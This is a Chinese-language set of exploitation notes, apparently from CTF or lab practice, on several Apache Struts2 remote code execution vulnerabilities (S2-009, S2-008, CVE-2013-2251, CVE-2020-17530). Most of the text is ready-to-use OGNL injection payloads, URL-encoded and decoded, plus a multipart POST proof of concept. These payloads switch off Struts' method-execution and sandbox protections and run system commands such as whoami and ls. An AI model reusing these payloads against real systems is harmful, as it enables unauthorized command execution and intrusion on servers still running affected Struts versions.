struts-s2-009 代码执行 （CVE-2011-3923）

参考：struts-s2-009 代码执行 （CVE-2011-3923）复现-CSDN博客

版本：2.1.0-2.3.1.1

漏洞简介：

恶意用户可以绕过内置在ParametersInterceptor中的所有保护（正则表达式模式，拒绝方法调用），从而能够在任何公开的字符串变量中注入恶意表达式以进行利用。

漏洞利用：

漏洞触发地址：

/ajax/example5.action

payload:

/ajax/example5.action?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27whoami%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]
​
urldecode:
/ajax/example5.action?age=12313&name=(#context["xwork.MethodAccessor.denyMethodExecution"]=+new+java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]=true, #a=@java.lang.Runtime@getRuntime().exec('whoami').getInputStream(),#b=new+java.io.InputStreamReader(#a),#c=new+java.io.BufferedReader(#b),#d=new+char[51020],#c.read(#d),#kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kxlzx.println(#d),#kxlzx.close())(meh)&z[(name)('meh')]
​
​

1、访问漏洞触发地址并抓包

2、修改url，利用payload进行漏洞利用：

struts-s2-008 代码执行 （CVE-2012-0391）

版本：2.1.0 <= Struts2 <= 2.3.1

漏洞简述：主要是利用对传入参数没有严格限制，导致多个地方可以执行恶意代码，传入?debug=command&expression=即可执行OGNL表达式。

漏洞利用：

1、payload：

debug=command&expression=(%23_memberAccess%5B"allowStaticMethodAccess"%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28"false"%29%20%2C%23context%5B"xwork.MethodAccessor.denyMethodExecution"%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27ls%20/tmp%27%29.getInputStream%28%29%29) 

payload原型： debug=command&expression=(#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ls /tmp').getInputStream()))

2、访问devmode.action抓包，运行payload获取flag如下：

struts2 命令执行 （CVE-2013-2251）

版本：2.0.0-2.3.15

简述：在struts2中，DefaultActionMapper类支持以"action:"、“redirect:”、"redirectAction:"作为导航或是重定向前缀，但是这些前缀后面同时可以跟OGNL表达式，由于struts2没有对这些前缀做过滤，导致利用OGNL表达式调用java静态方法执行任意系统命令。

漏洞利用：

自动化工具梭哈

struts2 代码执行 （CVE-2020-17530）

版本：Apache Struts 2.0.0-2.5.25

漏洞简述：Struts2 会对某些标签属性(比如id，其他属性有待寻找) 的属性值进行二次表达式解析，因此当这些标签属性中使用了%{x}且x的值用户可控时，用户再传入一个%{payload}即可造成OGNL表达式执行。S2-061是对S2-059沙盒进行的绕过

漏洞检验：

url处的id参数为例

payload：?id=%25%7b+%27test%27+%2b+(11+%2b+11).toString()%7d

可以看到得到的值为test22,证明存在该漏洞。

漏洞利用：

方法①利用bp抓包

修改Content-Type为：

multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF

POC:
------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"
%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("whoami")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

存在漏洞参数处抓包，修改发包方式为POST，发送该payload

方法②直接利用url

payload：
​
%25{(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application[%27org.apache.tomcat.InstanceManager%27]).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr[%27struts.valueStack%27]).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d{%27whoami%27}).(%23res%3d%23exec.exec(%23cmd))}